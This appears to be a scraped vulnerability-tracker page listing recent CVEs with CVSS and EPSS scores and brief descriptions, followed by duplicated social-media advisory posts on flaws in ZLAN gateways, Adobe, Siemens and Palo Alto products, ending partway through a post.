| CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
|---|---|---|---|---|---|---|---|
| CVE-2026-21511 | 7.5 | 0.26% | 2 | 0 | 2026-02-11T18:56:56.907000 | Deserialization of untrusted data in Microsoft Office Outlook allows an unauthor | |
| CVE-2026-24789 | 9.8 | 0.00% | 2 | 0 | 2026-02-11T18:31:36 | An unprotected API endpoint allows an attacker to remotely change the device pas | |
| CVE-2026-25084 | 9.8 | 0.00% | 2 | 0 | 2026-02-11T18:31:36 | Authentication for ZLAN5143D can be bypassed by directly accessing internal URLs | |
| CVE-2026-21357 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T18:29:22.320000 | InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based | |
| CVE-2026-23717 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T18:24:15.437000 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-0229 | 0 | 0.00% | 2 | 0 | 2026-02-11T18:16:07.897000 | A denial-of-service (DoS) vulnerability in the Advanced DNS Security (ADNS) feat | |
| CVE-2026-0228 | 0 | 0.00% | 2 | 0 | 2026-02-11T18:16:07.720000 | An improper certificate validation vulnerability in PAN-OS allows users to conne | |
| CVE-2026-21320 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T17:37:39.147000 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21323 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T17:37:04.913000 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21324 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T17:36:45.697000 | After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu | |
| CVE-2026-21328 | 7.8 | 0.01% | 2 | 0 | 2026-02-11T17:35:50.863000 | After Effects versions 25.6 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-21343 | 7.8 | 0.03% | 2 | 0 | 2026-02-11T17:16:03.557000 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21346 | 7.8 | 0.03% | 2 | 0 | 2026-02-11T17:15:14.187000 | Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds writ | |
| CVE-2026-1235 | 6.5 | 0.01% | 1 | 0 | 2026-02-11T16:16:03.583000 | The WP eCommerce WordPress plugin through 3.15.1 unserializes user input via aja | |
| CVE-2026-20841 | 8.8 | 0.08% | 100 | 3 | 2026-02-11T15:16:16.997000 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-1560 | 8.8 | 0.24% | 1 | 1 | 2026-02-11T09:30:25 | The Custom Block Builder – Lazy Blocks plugin for WordPress is vulnerable to Rem | |
| CVE-2026-1357 | 9.8 | 0.46% | 2 | 2 | 2026-02-11T06:30:48 | The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress | |
| CVE-2026-21531 | 9.8 | 0.16% | 3 | 0 | 2026-02-10T21:51:48.077000 | Deserialization of untrusted data in Azure SDK allows an unauthorized attacker t | |
| CVE-2026-21246 | 7.8 | 0.02% | 2 | 0 | 2026-02-10T21:51:48.077000 | Heap-based buffer overflow in Microsoft Graphics Component allows an authorized | |
| CVE-2026-21257 | 8.0 | 0.05% | 2 | 0 | 2026-02-10T21:51:48.077000 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-21537 | 8.8 | 0.05% | 2 | 0 | 2026-02-10T21:51:48.077000 | Improper control of generation of code ('code injection') in Microsoft Defender | |
| CVE-2026-25992 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T21:51:48.077000 | SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/ | |
| CVE-2026-21352 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:51:48.077000 | DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-1603 | 8.6 | 0.15% | 2 | 0 | 2026-02-10T21:51:48.077000 | An authentication bypass in Ivanti Endpoint Manager before version 2024 SU5 allo | |
| CVE-2026-21344 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:42 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-1507 | 7.5 | 0.05% | 2 | 0 | 2026-02-10T21:31:42 | The affected products are vulnerable to an uncaught exception that could allow a | |
| CVE-2026-21349 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:42 | Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds wri | |
| CVE-2026-21347 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:41 | Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow o | |
| CVE-2026-21345 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:41 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21353 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:41 | DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or W | |
| CVE-2026-21341 | 7.8 | 0.03% | 2 | 0 | 2026-02-10T21:31:37 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-21342 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T21:31:37 | Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds | |
| CVE-2026-1848 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T21:31:36 | Connections received from the proxy port may not count towards total accepted co | |
| CVE-2026-21514 | 7.8 | 6.65% | 12 | 0 | 2026-02-10T21:31:29 | Reliance on untrusted inputs in a security decision in Microsoft Office Word all | |
| CVE-2026-21525 | 6.2 | 8.55% | 10 | 0 | 2026-02-10T21:31:29 | Null pointer dereference in Windows Remote Access Connection Manager allows an u | |
| CVE-2026-21510 | 8.8 | 6.40% | 13 | 0 | 2026-02-10T21:31:29 | Protection mechanism failure in Windows Shell allows an unauthorized attacker to | |
| CVE-2026-21513 | 8.8 | 8.83% | 12 | 0 | 2026-02-10T21:31:29 | Protection mechanism failure in MSHTML Framework allows an unauthorized attacker | |
| CVE-2026-21519 | 7.8 | 1.67% | 11 | 0 | 2026-02-10T21:31:29 | Access of resource using incompatible type ('type confusion') in Desktop Window | |
| CVE-2026-21533 | 7.8 | 1.55% | 11 | 1 | 2026-02-10T21:31:29 | Improper privilege management in Windows Remote Desktop allows an authorized att | |
| CVE-2026-25577 | 7.5 | 0.05% | 2 | 0 | 2026-02-10T19:57:02 | ### Summary The `cookies` property in `emmett_core.http.wrappers.Request` does n | |
| CVE-2026-1529 | 8.1 | 0.02% | 3 | 2 | 2026-02-10T18:35:21 | A flaw was found in Keycloak. An attacker can exploit this vulnerability by modi | |
| CVE-2026-1486 | 8.8 | 0.04% | 2 | 0 | 2026-02-10T18:35:16 | A flaw was found in Keycloak. A vulnerability exists in the jwt-authorization-gr | |
| CVE-2026-25611 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T18:30:54 | A series of specifically crafted, unauthenticated messages can exhaust available | |
| CVE-2026-21260 | 7.5 | 0.08% | 2 | 0 | 2026-02-10T18:30:52 | Exposure of sensitive information to an unauthorized actor in Microsoft Office O | |
| CVE-2026-21259 | 7.8 | 0.04% | 2 | 0 | 2026-02-10T18:30:52 | Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized atta | |
| CVE-2026-21322 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu | |
| CVE-2026-21318 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-21330 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an Access of Resource Us | |
| CVE-2026-21327 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:52 | After Effects versions 25.6 and earlier are affected by an out-of-bounds write v | |
| CVE-2026-21251 | 7.8 | 0.04% | 2 | 0 | 2026-02-10T18:30:51 | Use after free in Windows Cluster Client Failover allows an authorized attacker | |
| CVE-2026-21250 | 7.8 | 0.04% | 2 | 0 | 2026-02-10T18:30:51 | Untrusted pointer dereference in Windows HTTP.sys allows an authorized attacker | |
| CVE-2026-21329 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:51 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21326 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:51 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21351 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:51 | After Effects versions 25.6 and earlier are affected by a Use After Free vulnera | |
| CVE-2026-21256 | 8.8 | 0.05% | 2 | 0 | 2026-02-10T18:30:50 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-21255 | 8.8 | 0.03% | 2 | 0 | 2026-02-10T18:30:50 | Improper access control in Windows Hyper-V allows an authorized attacker to bypa | |
| CVE-2026-21312 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:50 | Audition versions 25.3 and earlier are affected by an out-of-bounds write vulner | |
| CVE-2026-21321 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:50 | After Effects versions 25.6 and earlier are affected by an Integer Overflow or W | |
| CVE-2026-21325 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:50 | After Effects versions 25.6 and earlier are affected by an out-of-bounds read vu | |
| CVE-2026-21335 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:50 | Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bou | |
| CVE-2026-21334 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T18:30:50 | Substance3D - Designer versions 15.1.0 and earlier are affected by an out-of-bou | |
| CVE-2026-21516 | 8.8 | 0.04% | 2 | 0 | 2026-02-10T18:30:50 | Improper neutralization of special elements used in a command ('command injectio | |
| CVE-2026-22153 | 8.1 | 0.07% | 1 | 0 | 2026-02-10T18:30:48 | An Authentication Bypass by Primary Weakness vulnerability [CWE-305] vulnerabili | |
| CVE-2025-52436 | 8.8 | 0.14% | 1 | 0 | 2026-02-10T18:30:40 | An Improper Neutralization of Input During Web Page Generation ('Cross-site Scri | |
| CVE-2026-1602 | 6.5 | 0.05% | 2 | 0 | 2026-02-10T18:30:38 | SQL injection in Ivanti Endpoint Manager before version 2024 SU5 allows a remote | |
| CVE-2026-24061 | 9.8 | 36.95% | 4 | 62 | template | 2026-02-10T18:30:34 | telnetd in GNU Inetutils through 2.7 allows remote authentication bypass via a " |
| CVE-2025-6967 | 8.7 | 0.02% | 4 | 0 | 2026-02-10T15:30:34 | Execution After Redirect (EAR) vulnerability in Sarman Soft Software and Technol | |
| CVE-2026-0509 | 9.6 | 0.04% | 6 | 0 | 2026-02-10T15:22:54.740000 | SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated, | |
| CVE-2026-23687 | 8.8 | 0.05% | 5 | 0 | 2026-02-10T15:22:54.740000 | SAP NetWeaver Application Server ABAP and ABAP Platform allows an authenticated | |
| CVE-2025-40587 | 7.6 | 0.02% | 2 | 0 | 2026-02-10T15:22:54.740000 | A vulnerability has been identified in Polarion V2404 (All versions < V2404.5), | |
| CVE-2026-25656 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T15:22:54.740000 | A vulnerability has been identified in SINEC NMS (All versions), User Management | |
| CVE-2025-11242 | 9.8 | 0.04% | 2 | 0 | 2026-02-10T15:22:54.740000 | Server-Side Request Forgery (SSRF) vulnerability in Teknolist Computer Systems S | |
| CVE-2026-2094 | 8.8 | 0.08% | 4 | 0 | 2026-02-10T15:22:54.740000 | Docpedia developed by Flowring has a SQL Injection vulnerability, allowing authe | |
| CVE-2026-2093 | 7.5 | 0.05% | 1 | 0 | 2026-02-10T15:22:54.740000 | Docpedia developed by Flowring has a SQL Injection vulnerability, allowing unaut | |
| CVE-2026-0485 | 7.5 | 0.04% | 1 | 0 | 2026-02-10T15:22:54.740000 | SAP BusinessObjects BI Platform allows an unauthenticated attacker to send speci | |
| CVE-2025-15310 | 7.8 | 0.02% | 1 | 0 | 2026-02-10T15:22:54.740000 | Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To | |
| CVE-2026-25890 | 8.1 | 0.03% | 1 | 0 | 2026-02-10T15:22:54.740000 | File Browser provides a file managing interface within a specified directory and | |
| CVE-2026-25961 | 7.5 | 0.01% | 1 | 1 | 2026-02-10T15:22:54.740000 | SumatraPDF is a multi-format reader for Windows. In 3.5.0 through 3.5.2, Sumatra | |
| CVE-2026-24684 | 7.5 | 0.04% | 2 | 0 | 2026-02-10T15:02:32.033000 | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0 | |
| CVE-2026-23720 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:34 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-2268 | 7.5 | 0.06% | 2 | 1 | 2026-02-10T12:30:34 | The Ninja Forms plugin for WordPress is vulnerable to Sensitive Information Expo | |
| CVE-2026-22923 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:33 | A vulnerability has been identified in NX (All versions < V2512). The affected a | |
| CVE-2026-25655 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:33 | A vulnerability has been identified in SINEC NMS (All versions < V4.0 SP2). The | |
| CVE-2026-23719 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:28 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-23718 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:28 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-23716 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:28 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-23715 | 7.8 | 0.01% | 2 | 0 | 2026-02-10T12:30:27 | A vulnerability has been identified in Simcenter Femap (All versions < V2512), S | |
| CVE-2026-2095 | 9.8 | 0.17% | 3 | 0 | 2026-02-10T09:30:31 | Agentflow developed by Flowring has an Authentication Bypass vulnerability, allo | |
| CVE-2026-2096 | 9.8 | 0.13% | 5 | 0 | 2026-02-10T09:30:31 | Agentflow developed by Flowring has a Missing Authentication vulnerability, allo | |
| CVE-2026-2097 | 8.8 | 0.21% | 4 | 0 | 2026-02-10T09:30:31 | Agentflow developed by Flowring has an Arbitrary File Upload vulnerability, allo | |
| CVE-2026-24322 | 7.7 | 0.03% | 2 | 0 | 2026-02-10T06:30:45 | SAP Solution Tools Plug-In (ST-PI) contains a function module that does not perf | |
| CVE-2026-23689 | 7.7 | 0.07% | 1 | 0 | 2026-02-10T06:30:44 | Due to an uncontrolled resource consumption (Denial of Service) vulnerability, a | |
| CVE-2025-11547 | 7.8 | 0.01% | 1 | 0 | 2026-02-10T06:30:40 | AXIS Camera Station Pro contained a flaw to perform a privilege escalation attac | |
| CVE-2026-0490 | 7.5 | 0.08% | 1 | 0 | 2026-02-10T06:30:39 | SAP BusinessObjects BI Platform allows an unauthenticated attacker to craft a sp | |
| CVE-2026-0488 | 10.0 | 0.04% | 3 | 0 | 2026-02-10T06:30:38 | An authenticated attacker in SAP CRM and SAP S/4HANA (Scripting Editor) could ex | |
| CVE-2026-25958 | 7.7 | 0.01% | 1 | 0 | 2026-02-10T02:57:34 | ### **Impact** It is possible to make a specially crafted request with a valid | |
| CVE-2026-25939 | None | 0.03% | 1 | 1 | 2026-02-10T02:56:59 | ### Summary An authorization bypass vulnerability in the FUXA allows an unauthen | |
| CVE-2026-25881 | 9.1 | 0.05% | 1 | 0 | 2026-02-10T02:56:34 | ### Summary A sandbox escape vulnerability allows sandboxed code to mutate host | |
| CVE-2026-25892 | 7.5 | 0.06% | 1 | 0 | 2026-02-10T02:56:05 | ### Summary Adminer v5.4.1 has a version check mechanism where `adminer.org` sen | |
| CVE-2025-15319 | 7.8 | 0.01% | 1 | 0 | 2026-02-10T00:30:37 | Tanium addressed a local privilege escalation vulnerability in Patch Endpoint To | |
| CVE-2026-25791 | 7.5 | 0.04% | 1 | 0 | 2026-02-09T22:39:51 | ## Summary The DNS C2 listener accepts unauthenticated `TOTP` bootstrap messages | |
| CVE-2026-25639 | 7.5 | 0.01% | 2 | 0 | 2026-02-09T22:39:36 | # Denial of Service via **proto** Key in mergeConfig ### Summary The `mergeCon | |
| CVE-2026-25761 | 8.8 | 0.04% | 1 | 0 | 2026-02-09T21:55:30.093000 | Super-linter is a combination of multiple linters to run as a GitHub Action or s | |
| CVE-2026-25057 | 9.1 | 0.04% | 1 | 0 | 2026-02-09T21:55:30.093000 | MarkUs is a web application for the submission and grading of student assignment | |
| CVE-2025-69214 | 8.8 | 0.01% | 1 | 0 | 2026-02-09T21:53:03.017000 | OpenSTAManager is an open source management software for technical assistance an | |
| CVE-2026-2234 | 9.1 | 0.05% | 2 | 0 | 2026-02-09T09:30:28 | C&Cm@il developed by HGiga has a Missing Authentication vulnerability, allowing | |
| CVE-2026-1731 | None | 3.57% | 2 | 3 | template | 2026-02-07T00:30:34 | BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote |
| CVE-2025-69212 | None | 0.09% | 1 | 0 | 2026-02-06T22:11:48 | ## Summary A critical OS Command Injection vulnerability exists in the P7M (sign | |
| CVE-2026-25752 | None | 0.04% | 2 | 0 | 2026-02-06T21:42:47 | ### Summary **Description** An authorization bypass vulnerability in FUXA allows | |
| CVE-2026-25751 | None | 0.02% | 2 | 0 | 2026-02-06T21:42:43 | ### Description An information disclosure vulnerability in FUXA allows an unauth | |
| CVE-2025-64175 | None | 0.01% | 2 | 0 | 2026-02-06T19:06:46 | Contact OpenAI Security Research at outbounddisclosures@openai.com to engage on | |
| CVE-2025-64111 | None | 0.09% | 2 | 0 | 2026-02-06T19:06:45 | ### Summary Due to the insufficient patch for the https://github.com/gogs/gogs/s | |
| CVE-2026-2103 | 7.1 | 0.01% | 1 | 0 | 2026-02-06T18:30:43 | Infor SyteLine ERP uses hard-coded static cryptographic keys to encrypt stored c | |
| CVE-2026-24423 | 9.8 | 9.22% | 1 | 1 | 2026-02-06T18:30:29 | SmarterTools SmarterMail versions prior to build 9511 contain an unauthenticated | |
| CVE-2026-0227 | 7.5 | 0.06% | 2 | 2 | 2026-02-06T17:37:28.723000 | A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated | |
| CVE-2026-21643 | 9.8 | 0.13% | 6 | 0 | 2026-02-06T09:30:35 | An improper neutralization of special elements used in an sql command ('sql inje | |
| CVE-2026-25049 | 9.9 | 0.03% | 5 | 1 | 2026-02-05T20:22:47.870000 | n8n is an open source workflow automation platform. Prior to versions 1.123.17 a | |
| CVE-2026-20119 | 7.5 | 0.09% | 2 | 0 | 2026-02-05T14:57:20.563000 | A vulnerability in the text rendering subsystem of Cisco TelePresence Collaborat | |
| CVE-2025-24054 | 6.5 | 11.25% | 1 | 9 | 2026-02-04T21:31:24 | External control of file name or path in Windows NTLM allows an unauthorized att | |
| CVE-2025-40551 | 9.8 | 54.99% | 1 | 0 | template | 2026-02-04T02:00:02.030000 | SolarWinds Web Help Desk was found to be susceptible to an untrusted data deseri |
| CVE-2026-1281 | 9.8 | 16.41% | 2 | 1 | 2026-01-30T13:28:18.610000 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2026-1340 | 9.8 | 0.18% | 2 | 1 | 2026-01-30T00:31:28 | A code injection in Ivanti Endpoint Manager Mobile allowing attackers to achieve | |
| CVE-2015-10145 | 8.8 | 0.10% | 2 | 0 | 2026-01-29T18:32:39 | Gargoyle router management utility versions 1.5.x contain an authenticated OS co | |
| CVE-2025-15467 | 9.8 | 0.66% | 2 | 4 | 2026-01-29T15:31:31 | Issue summary: Parsing CMS AuthEnvelopedData message with maliciously crafted AE | |
| CVE-2026-20817 | 7.8 | 0.06% | 1 | 0 | 2026-01-13T18:31:17 | Improper handling of insufficient permissions or privileges in Windows Error Rep | |
| CVE-2026-20026 | 5.8 | 0.13% | 2 | 0 | 2026-01-08T18:08:54.147000 | Multiple Cisco products are affected by a vulnerability in the processing o | |
| CVE-2026-20027 | 5.3 | 0.04% | 2 | 0 | 2026-01-08T18:08:54.147000 | Multiple Cisco products are affected by a vulnerability in the processing of DCE | |
| CVE-2023-4911 | 7.8 | 73.04% | 1 | 17 | template | 2026-01-08T16:28:27.603000 | A buffer overflow was discovered in the GNU C Library's dynamic loader ld.so whi |
| CVE-2025-43529 | 8.8 | 0.03% | 2 | 7 | 2025-12-18T14:59:05.617000 | A use-after-free issue was addressed with improved memory management. This issue | |
| CVE-2025-14174 | 8.8 | 0.65% | 2 | 6 | 2025-12-15T15:16:08.650000 | Out of bounds memory access in ANGLE in Google Chrome on Mac prior to 143.0.7499 | |
| CVE-2024-2511 | 5.9 | 3.67% | 1 | 0 | 2025-11-04T00:31:52 | Issue summary: Some non-default TLS server configurations can cause unbounded me | |
| CVE-2025-60787 | 7.2 | 40.20% | 1 | 1 | 2025-11-03T21:48:21 | ## Summary A command injection vulnerability in MotionEye allows attackers to ac | |
| CVE-2025-8088 | 8.8 | 3.90% | 2 | 28 | 2025-10-22T00:34:26 | A path traversal vulnerability affecting the Windows version of WinRAR allows th | |
| CVE-2025-53770 | 9.8 | 89.20% | 4 | 46 | template | 2025-10-22T00:34:26 | Deserialization of untrusted data in on-premises Microsoft SharePoint Server all |
| CVE-2018-0802 | 7.8 | 93.89% | 2 | 7 | 2025-10-22T00:31:30 | Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Offic | |
| CVE-2025-26399 | 9.8 | 12.86% | 4 | 1 | 2025-09-23T06:30:33 | SolarWinds Web Help Desk was found to be susceptible to an unauthenticated AjaxP | |
| CVE-2025-59375 | 7.5 | 0.12% | 1 | 0 | 2025-09-17T15:31:32 | libexpat in Expat before 2.7.2 allows attackers to trigger large dynamic memory | |
| CVE-2025-27158 | 7.8 | 0.04% | 1 | 0 | 2025-04-28T16:48:57.070000 | Acrobat Reader versions 24.001.30225, 20.005.30748, 25.001.20428 and earlier are | |
| CVE-2025-3573 | 6.1 | 0.25% | 2 | 0 | 2025-04-15T14:24:22 | Versions of the package jquery-validation before 1.20.0 are vulnerable to Cross- | |
| CVE-2026-20700 | 0 | 0.00% | 2 | 0 | N/A | ||
| CVE-2026-25993 | 0 | 0.03% | 1 | 0 | N/A | ||
| CVE-2026-26009 | 0 | 0.26% | 3 | 0 | N/A | ||
| CVE-2026-21523 | 0 | 0.04% | 2 | 0 | N/A | ||
| CVE-2026-25947 | 0 | 0.03% | 2 | 0 | N/A | ||
| CVE-2026-25506 | 0 | 0.02% | 2 | 0 | N/A | ||
| CVE-2026-24682 | 0 | 0.04% | 2 | 0 | N/A | ||
| CVE-2026-25646 | 0 | 0.04% | 2 | 0 | N/A | ||
| CVE-2026-23876 | 0 | 0.06% | 1 | 0 | N/A | ||
| CVE-2026-24476 | 0 | 0.03% | 1 | 0 | N/A | ||
| CVE-2026-25931 | 0 | 0.01% | 1 | 0 | N/A | ||
| CVE-2026-25808 | 0 | 0.03% | 1 | 0 | N/A | ||
| CVE-2026-25807 | 0 | 0.11% | 1 | 1 | N/A | ||
| CVE-2026-25880 | 0 | 0.01% | 1 | 0 | N/A | ||
| CVE-2026-25925 | 0 | 0.05% | 1 | 0 | N/A | ||
| CVE-2026-25231 | 0 | 0.06% | 2 | 0 | N/A |
updated 2026-02-11T18:56:56.907000
2 posts
🟠 CVE-2026-21511 - High (7.5)
Deserialization of untrusted data in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21511/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21511 - High (7.5)
Deserialization of untrusted data in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21511/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:31:36
2 posts
Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways
ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.
**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-bypass-flaws-uncovered-in-zlan-industrial-gateways-k-4-k-9-i/gD2P6Ple2L
Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways
ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.
**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-bypass-flaws-uncovered-in-zlan-industrial-gateways-k-4-k-9-i/gD2P6Ple2L
updated 2026-02-11T18:31:36
2 posts
Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways
ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.
**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-bypass-flaws-uncovered-in-zlan-industrial-gateways-k-4-k-9-i/gD2P6Ple2L
Critical Authentication Bypass Flaws Reported in ZLAN Industrial Gateways
ZLAN5143D industrial gateways contain two critical vulnerabilities (CVE-2026-25084 and CVE-2026-24789) that allow unauthenticated remote attackers to bypass security and reset device passwords. The vendor has not yet responded to these issues and there are no patches.
**If you use ZLAN5143D gateways, make sure they are isolated from the internet and accessible only from trusted networks. Since the vendor hasn't provided a patch, network isolation and VPN-only access are your only defense. Reach out to the vendor for patches, and if no patches are available, start planning a replacement.**
#cybersecurity #infosec #advisory #vulnerability
https://beyondmachines.net/event_details/critical-authentication-bypass-flaws-uncovered-in-zlan-industrial-gateways-k-4-k-9-i/gD2P6Ple2L
updated 2026-02-11T18:29:22.320000
2 posts
🟠 CVE-2026-21357 - High (7.8)
InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21357/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21357 - High (7.8)
InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21357/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:24:15.437000
2 posts
🟠 CVE-2026-23717 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-23717 - High (7.8)
A vulnerability has been identified in Simcenter Femap (All versions < V2512), Simcenter Nastran (All versions < V2512). The affected applications contains an out of bounds read vulnerability while parsing specially crafted XDB files. This c...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-23717/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-11T18:16:07.897000
2 posts
Palo Alto has three new advisories.
- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) https://security.paloaltonetworks.com/PAN-SA-2026-0002
- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature https://security.paloaltonetworks.com/CVE-2026-0229
- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate https://security.paloaltonetworks.com/CVE-2026-0228 #PaloAlto #infosec #vulnerability
##Palo Alto has three new advisories.
- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) https://security.paloaltonetworks.com/PAN-SA-2026-0002
- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature https://security.paloaltonetworks.com/CVE-2026-0229
- CVE-2026-0228 PAN-OS: Improper Validation of Terminal Server Agent Certificate https://security.paloaltonetworks.com/CVE-2026-0228 #PaloAlto #infosec #vulnerability
##updated 2026-02-11T18:16:07.720000
2 posts
Palo Alto has three new advisories.
- This affects several CVEs: PAN-SA-2026-0002 Chromium: Monthly Vulnerability Update (February 2026) https://security.paloaltonetworks.com/PAN-SA-2026-0002
- CVE-2026-0229 PAN-OS: Denial of Service in Advanced DNS Security Feature https://security.paloaltonetworks.com/CVE-2026-0229
